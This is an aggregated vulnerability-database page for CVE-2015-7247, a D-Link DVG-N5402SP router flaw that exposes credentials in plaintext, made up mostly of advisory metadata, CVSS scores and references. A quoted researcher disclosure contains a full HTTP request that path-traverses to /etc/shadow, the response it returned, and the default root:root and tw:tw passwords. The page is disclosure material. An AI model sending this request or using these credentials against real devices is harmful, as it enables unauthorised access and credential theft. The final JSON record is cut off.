CVE-2015-7247 (GCVE-0-2015-7247)

Vulnerability from cvelistv5 – Published: 2017-04-24 18:00 – Updated: 2024-08-06 07:43

Summary

Severity ?

No CVSS data available.

CWE

Assigner

certcc

References

URL

CNVD-2016-01162

Vulnerability from cnvd - Published: 2016-02-22

Title

D-Link DVG-N5402SP信息泄露漏洞

Description

D-Link DVG-N5402SP是友讯（D-Link）公司的一款通过IP网络进行语音、传真和共享无线互联网的无线路由器产品。 D-Link DVG-N5402SP中存在安全漏洞，该漏洞源于程序以明文形式存储数据。攻击者可利用该漏洞获取敏感信息。

Severity

中

Formal description

目前没有详细的解决方案提供： http://www.dlink.com/

Reference

http://www.securityfocus.com/bid/82754

Impacted products

Name
D-Link DVGÂN5402SP

Show details on source website

JSON

To clipboard

{
  "bids": {
    "bid": {
      "bidNumber": "82754"
    }
  },
  "cves": {
    "cve": {
      "cveNumber": "CVE-2015-7247"
    }
  },
  "description": "D-Link DVG-N5402SP\u662f\u53cb\u8baf\uff08D-Link\uff09\u516c\u53f8\u7684\u4e00\u6b3e\u901a\u8fc7IP\u7f51\u7edc\u8fdb\u884c\u8bed\u97f3\u3001\u4f20\u771f\u548c\u5171\u4eab\u65e0\u7ebf\u4e92\u8054\u7f51\u7684\u65e0\u7ebf\u8def\u7531\u5668\u4ea7\u54c1\u3002\r\n\r\nD-Link DVG-N5402SP\u4e2d\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u6e90\u4e8e\u7a0b\u5e8f\u4ee5\u660e\u6587\u5f62\u5f0f\u5b58\u50a8\u6570\u636e\u3002\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u83b7\u53d6\u654f\u611f\u4fe1\u606f\u3002",
  "discovererName": "Karn Ganeshen",
  "formalWay": "\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u7684\u89e3\u51b3\u65b9\u6848\u63d0\u4f9b\uff1a\r\nhttp://www.dlink.com/",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2016-01162",
  "openTime": "2016-02-22",
  "products": {
    "product": "D-Link DVG\u00c2\u00adN5402SP"
  },
  "referenceLink": "http://www.securityfocus.com/bid/82754",
  "serverity": "\u4e2d",
  "submitTime": "2016-02-22",
  "title": "D-Link DVG-N5402SP\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e"
}

VAR-201704-0220

Vulnerability from variot - Updated: 2025-04-20 23:13

D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 discloses usernames, passwords, keys, values, and web account hashes (super and admin) in plaintext when running a configuration backup, which allows remote attackers to obtain sensitive information. The D-Link DVG-N5402SP is a wireless router product from D-Link for voice, fax and shared wireless Internet over IP networks. A security vulnerability exists in the D-LinkDVG-N5402SP that originated from the program storing data in clear text. An attacker could exploit this vulnerability to obtain sensitive information. DLink DVGÂN5402SP is prone to multiple security vulnerabilities. Attackers can leverage these issues to bypass the authentication mechanism and gain access to the vulnerable device, use directory-traversal characters ('../') and obtain sensitive information; other attacks are also possible. DLink DVGN5402SP File Path Traversal, Weak Credentials Management, and Sensitive Info Leakage Vulnerabilities

Timelines Reported to CERT + Vendor: August 2015 Dlink released beta release: Oct 23, 2015 New fix release: MD5 (GRNV6.1U23J-83-DL-R1B114-SG_Normal.EN.img) = 04fd8b901e9f297a4cdbea803a9a43cb No public disclosure till date - Dlink waiting for Service providers to ask for new release + CERT opted out

Vulnerable Models, Firmware, Hardware versions DVGN5402SP Web Management Model Name : GPN2.4P21CCN Firmware Version : W1000CN00 Firmware Version :W1000CN03 Firmware Version :W2000EN00 Hardware Platform :ZS Hardware Version :Gpn2.4P21C_WIFIV0.05

Device can be managed through three users: 1. super full privileges 2. admin full privileges 3. support restricted user

1. Path traversal Arbitrary files can be read off of the device file system. CVE-ID: CVE-2015-7245

*HTTP Request *

POST /cgibin/webproc HTTP/1.1 Host: :8080 UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 AcceptLanguage: enUS,en;q=0.5 AcceptEncoding: gzip, deflate Referer: http://:8080/cgibin/webproc Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super Connection: keepalive ContentType: application/xwwwformurlencoded ContentLength: 223

getpage=html%2Findex.html&errorpage=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var% &objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh

HTTP Response

HTTP/1.0 200 OK pstVal>name:getpage; pstVal>value:html/main.html pstVal>name:getpage; pstVal>value:html/index.html pstVal>name:errorpage; pstVal>value:../../../../../../../../../../../etc/shadow pstVal>name:var:menu; pstVal>value:setup pstVal>name:var:page; pstVal>value:connected pstVal>name:var:subpage; pstVal>value: pstVal>name:objaction; pstVal>value:auth pstVal>name::username; pstVal>value:super pstVal>name::password; pstVal>value:super pstVal>name::action; pstVal>value:login pstVal>name::sessionid; pstVal>value:1ac5da6b Connection: close Contenttype: text/html Pragma: nocache CacheControl: nocache setcookie: sessionid=1ac5da6b; expires=Fri, 31Dec9999 23:59:59 GMT; path=/

root::13796:0:99999:7:::

tw::13796:0:99999:7:::

2. Use of Default, HardCoded CredentialsCVE-ID: CVE-2015-7246

The device has two system user accounts configured with default passwords (root:root, tw:tw). Login tw is not active though. Anyone could use the default password to gain administrative control through the Telnet service of the system (when enabled) leading to integrity, loss of confidentiality, or loss of availability. It is noted that restricted 'support' user may also access this config backup file from the portal directly, gather clear-text admin creds, and gain full, unauthorized access to the device. -- Best Regards, Karn Ganeshen ipositivesecurity.blogspot.in

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "dvg-n5402sp",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "d link",
        "version": "w1000cn-00"
      },
      {
        "_id": null,
        "model": "dvg-n5402sp",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "d link",
        "version": "w1000cn-03"
      },
      {
        "_id": null,
        "model": "dvg-n5402sp",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "d link",
        "version": "w2000en-00"
      },
      {
        "_id": null,
        "model": "dvg\\303\\202\\302\\255n5402sp",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-01162"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007545"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-372"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7247"
      }
    ]
  },
  "configurations": {
    "_id": null,
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:d-link:dvg-n5402sp_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007545"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Karn Ganeshen",
    "sources": [
      {
        "db": "BID",
        "id": "82754"
      },
      {
        "db": "PACKETSTORM",
        "id": "135590"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-372"
      }
    ],
    "trust": 1.0
  },
  "cve": "CVE-2015-7247",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2015-7247",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 1.9,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2016-01162",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "VHN-85208",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:C/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2015-7247",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.8,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2015-7247",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "NVD",
            "id": "CVE-2015-7247",
            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2016-01162",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201602-372",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-85208",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2015-7247",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-01162"
      },
      {
        "db": "VULHUB",
        "id": "VHN-85208"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7247"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007545"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-372"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7247"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 discloses usernames, passwords, keys, values, and web account hashes (super and admin) in plaintext when running a configuration backup, which allows remote attackers to obtain sensitive information. The D-Link DVG-N5402SP is a wireless router product from D-Link for voice, fax and shared wireless Internet over IP networks. A security vulnerability exists in the D-LinkDVG-N5402SP that originated from the program storing data in clear text. An attacker could exploit this vulnerability to obtain sensitive information. DLink DVG\u00c2\u00adN5402SP is prone to multiple security vulnerabilities. \nAttackers can leverage these issues to bypass the authentication  mechanism and gain access to the vulnerable device, use  directory-traversal characters (\u0027../\u0027) and obtain sensitive information;  other  attacks are also possible.  DLink DVG\u00adN5402SP File Path Traversal, Weak Credentials Management, and\nSensitive Info Leakage Vulnerabilities\n\n*Timelines*\nReported to CERT + Vendor: August 2015\nDlink released beta release: Oct 23, 2015\nNew fix release: MD5 (GRNV6.1U23J-83-DL-R1B114-SG_Normal.EN.img) =\n04fd8b901e9f297a4cdbea803a9a43cb\nNo public disclosure till date - Dlink waiting for Service providers to ask\nfor new release + CERT opted out\n\n\n*Vulnerable Models, Firmware, Hardware versions*\nDVG\u00adN5402SP Web Management\nModel Name : GPN2.4P21\u00adC\u00adCN\nFirmware Version : W1000CN\u00ad00\nFirmware Version :W1000CN\u00ad03\nFirmware Version :W2000EN\u00ad00\nHardware Platform :ZS\nHardware Version :Gpn2.4P21\u00adC_WIFI\u00adV0.05\n\nDevice can be managed through three users:\n1. super \u00ad full privileges\n2. admin \u00ad full privileges\n3. support \u00ad restricted user\n\n*1. Path traversal*\nArbitrary files can be read off of the device file system. \n*CVE-ID*: CVE-2015-7245\n\n*HTTP Request *\n\nPOST /cgi\u00adbin/webproc HTTP/1.1\nHost: \u003cIP\u003e:8080\nUser\u00adAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101\nFirefox/39.0 Accept:\ntext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept\u00adLanguage: en\u00adUS,en;q=0.5\nAccept\u00adEncoding: gzip, deflate\nReferer: http://\u003cIP\u003e:8080/cgi\u00adbin/webproc\nCookie: sessionid=abcdefgh; language=en_us; sys_UserName=super\nConnection: keep\u00adalive\nContent\u00adType: application/x\u00adwww\u00adform\u00adurlencoded\nContent\u00adLength: 223\n\ngetpage=html%2Findex.html\u0026*errorpage*=../../../../../../../../../../../etc/shadow\u0026var%3Amenu=setup\u0026var%3Apage=connected\u0026var%\n\u0026obj\u00adaction=auth\u0026%3Ausername=blah\u0026%3Apassword=blah\u0026%3Aaction=login\u0026%3Asessionid=abcdefgh\n\n\n*HTTP Response*\n\nHTTP/1.0 200 OK\npstVal\u00ad\u003ename:getpage; pstVal\u00ad\u003evalue:html/main.html\npstVal\u00ad\u003ename:getpage; pstVal\u00ad\u003evalue:html/index.html\npstVal\u00ad\u003ename:errorpage;\npstVal\u00ad\u003evalue:../../../../../../../../../../../etc/shadow\npstVal\u00ad\u003ename:var:menu; pstVal\u00ad\u003evalue:setup\npstVal\u00ad\u003ename:var:page; pstVal\u00ad\u003evalue:connected\npstVal\u00ad\u003ename:var:subpage; pstVal\u00ad\u003evalue:\u00ad\npstVal\u00ad\u003ename:obj\u00adaction; pstVal\u00ad\u003evalue:auth\npstVal\u00ad\u003ename::username; pstVal\u00ad\u003evalue:super\npstVal\u00ad\u003ename::password; pstVal\u00ad\u003evalue:super\npstVal\u00ad\u003ename::action; pstVal\u00ad\u003evalue:login\npstVal\u00ad\u003ename::sessionid; pstVal\u00ad\u003evalue:1ac5da6b\nConnection: close\nContent\u00adtype: text/html\nPragma: no\u00adcache\nCache\u00adControl: no\u00adcache\nset\u00adcookie: sessionid=1ac5da6b; expires=Fri, 31\u00adDec\u00ad9999 23:59:59 GMT;\npath=/\n\n#root:\u003chash_redacted\u003e:13796:0:99999:7:::\nroot:\u003chash_redacted\u003e:13796:0:99999:7:::\n#tw:\u003chash_redacted\u003e:13796:0:99999:7:::\n#tw:\u003chash_redacted\u003e:13796:0:99999:7:::\n\n\n*2. Use of Default, Hard\u00adCoded Credentials**CVE-ID*: CVE-2015-7246\n\nThe device has two system user accounts configured with default passwords\n(root:root, tw:tw). \nLogin \u00ad tw \u00ad is not active though. Anyone could use the default password to\ngain administrative control through the Telnet service of the system (when\nenabled) leading to integrity, loss of confidentiality, or loss of\navailability. It is noted that restricted\n\u0027support\u0027 user may also access this config backup file from the portal\ndirectly, gather clear-text admin creds, and gain full, unauthorized access\nto the device. \n-- \nBest Regards,\nKarn Ganeshen\nipositivesecurity.blogspot.in\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-7247"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007545"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-01162"
      },
      {
        "db": "BID",
        "id": "82754"
      },
      {
        "db": "VULHUB",
        "id": "VHN-85208"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7247"
      },
      {
        "db": "PACKETSTORM",
        "id": "135590"
      }
    ],
    "trust": 2.7
  },
  "exploit_availability": {
    "_id": null,
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-85208",
        "trust": 0.1,
        "type": "unknown"
      },
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=39409",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-85208"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7247"
      }
    ]
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2015-7247",
        "trust": 3.6
      },
      {
        "db": "PACKETSTORM",
        "id": "135590",
        "trust": 2.7
      },
      {
        "db": "EXPLOIT-DB",
        "id": "39409",
        "trust": 1.8
      },
      {
        "db": "BID",
        "id": "82754",
        "trust": 1.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007545",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-372",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-01162",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-85208",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7247",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-01162"
      },
      {
        "db": "VULHUB",
        "id": "VHN-85208"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7247"
      },
      {
        "db": "BID",
        "id": "82754"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007545"
      },
      {
        "db": "PACKETSTORM",
        "id": "135590"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-372"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7247"
      }
    ]
  },
  "id": "VAR-201704-0220",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-01162"
      },
      {
        "db": "VULHUB",
        "id": "VHN-85208"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "_id": null,
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-01162"
      }
    ]
  },
  "last_update_date": "2025-04-20T23:13:14.342000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.dlink.com/uk/en"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007545"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-200",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-85208"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007545"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7247"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 2.6,
        "url": "http://packetstormsecurity.com/files/135590/d-link-dvg-n5402sp-path-traversal-information-disclosure.html"
      },
      {
        "trust": 2.1,
        "url": "http://seclists.org/fulldisclosure/2016/feb/24"
      },
      {
        "trust": 1.9,
        "url": "https://www.exploit-db.com/exploits/39409/"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7247"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7247"
      },
      {
        "trust": 0.7,
        "url": "http://www.securityfocus.com/bid/82754"
      },
      {
        "trust": 0.3,
        "url": "http://www.dlink.co.in/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/200.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7245"
      },
      {
        "trust": 0.1,
        "url": "http://\u003cip\u003e:8080/cgi\u00adbin/webproc"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7246"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-01162"
      },
      {
        "db": "VULHUB",
        "id": "VHN-85208"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7247"
      },
      {
        "db": "BID",
        "id": "82754"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007545"
      },
      {
        "db": "PACKETSTORM",
        "id": "135590"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-372"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7247"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-01162",
        "ident": null
      },
      {
        "db": "VULHUB",
        "id": "VHN-85208",
        "ident": null
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7247",
        "ident": null
      },
      {
        "db": "BID",
        "id": "82754",
        "ident": null
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007545",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "135590",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-372",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7247",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2016-02-22T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2016-01162",
        "ident": null
      },
      {
        "date": "2017-04-24T00:00:00",
        "db": "VULHUB",
        "id": "VHN-85208",
        "ident": null
      },
      {
        "date": "2017-04-24T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-7247",
        "ident": null
      },
      {
        "date": "2016-02-03T00:00:00",
        "db": "BID",
        "id": "82754",
        "ident": null
      },
      {
        "date": "2017-05-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-007545",
        "ident": null
      },
      {
        "date": "2016-02-03T20:32:22",
        "db": "PACKETSTORM",
        "id": "135590",
        "ident": null
      },
      {
        "date": "2016-02-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201602-372",
        "ident": null
      },
      {
        "date": "2017-04-24T18:59:00.240000",
        "db": "NVD",
        "id": "CVE-2015-7247",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2016-02-22T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2016-01162",
        "ident": null
      },
      {
        "date": "2017-04-28T00:00:00",
        "db": "VULHUB",
        "id": "VHN-85208",
        "ident": null
      },
      {
        "date": "2017-04-28T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-7247",
        "ident": null
      },
      {
        "date": "2016-07-05T21:22:00",
        "db": "BID",
        "id": "82754",
        "ident": null
      },
      {
        "date": "2017-05-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-007545",
        "ident": null
      },
      {
        "date": "2023-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201602-372",
        "ident": null
      },
      {
        "date": "2025-04-20T01:37:25.860000",
        "db": "NVD",
        "id": "CVE-2015-7247",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-372"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "_id": null,
    "data": "D-Link DVG-N5402SP Vulnerability in which important information is obtained in the firmware of",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007545"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "_id": null,
    "data": "information disclosure",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-372"
      }
    ],
    "trust": 0.6
  }
}

GHSA-P72R-G2H2-XJJ2

Vulnerability from github – Published: 2022-05-17 02:47 – Updated: 2025-04-20 03:36

Details

Severity ?

9.8 (Critical)


                  
                    CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2015-7247"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-04-24T18:59:00Z",
    "severity": "CRITICAL"
  },
  "details": "D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 discloses usernames, passwords, keys, values, and web account hashes (super and admin) in plaintext when running a configuration backup, which allows remote attackers to obtain sensitive information.",
  "id": "GHSA-p72r-g2h2-xjj2",
  "modified": "2025-04-20T03:36:34Z",
  "published": "2022-05-17T02:47:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-7247"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/39409"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2016/Feb/24"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

FKIE_CVE-2015-7247

Vulnerability from fkie_nvd - Published: 2017-04-24 18:59 - Updated: 2025-04-20 01:37

Severity ?

9.8 (Critical) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
cret@cert.org	http://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html	Exploit, Third Party Advisory, VDB Entry
cret@cert.org	http://seclists.org/fulldisclosure/2016/Feb/24	Exploit, Third Party Advisory, VDB Entry
cret@cert.org	https://www.exploit-db.com/exploits/39409/	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2016/Feb/24	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/39409/	Exploit, Third Party Advisory, VDB Entry

Impacted products

Vendor	Product	Version
d-link	dvg-n5402sp_firmware	w1000cn-00
d-link	dvg-n5402sp_firmware	w1000cn-03
d-link	dvg-n5402sp_firmware	w2000en-00
dlink	dvg-n5402sp	-

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E680460-D6EC-4F2D-BC22-809E3EC760D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-03:*:*:*:*:*:*:*",
              "matchCriteriaId": "F205BCFB-2DFF-4C70-9A8A-9543429EE4A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:d-link:dvg-n5402sp_firmware:w2000en-00:*:*:*:*:*:*:*",
              "matchCriteriaId": "167065E0-5D65-4990-B1BC-7CC508D5E316",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dvg-n5402sp:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "075479F8-8E2B-45C9-9D6E-33245F9DABF0",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 discloses usernames, passwords, keys, values, and web account hashes (super and admin) in plaintext when running a configuration backup, which allows remote attackers to obtain sensitive information."
    },
    {
      "lang": "es",
      "value": "DLink DVGN5402SP con firmware W1000CN00, W1000CN03 o W2000EN00 revela nombres de usuario, contrase\u00f1as, claves, valores y hashes de cuentas web (super y admin) en texto plano al ejecutar una copia de seguridad de configuraci\u00f3n, lo que permite a atacantes remotos obtener informaci\u00f3n sensible."
    }
  ],
  "id": "CVE-2015-7247",
  "lastModified": "2025-04-20T01:37:25.860",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 7.8,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2017-04-24T18:59:00.240",
  "references": [
    {
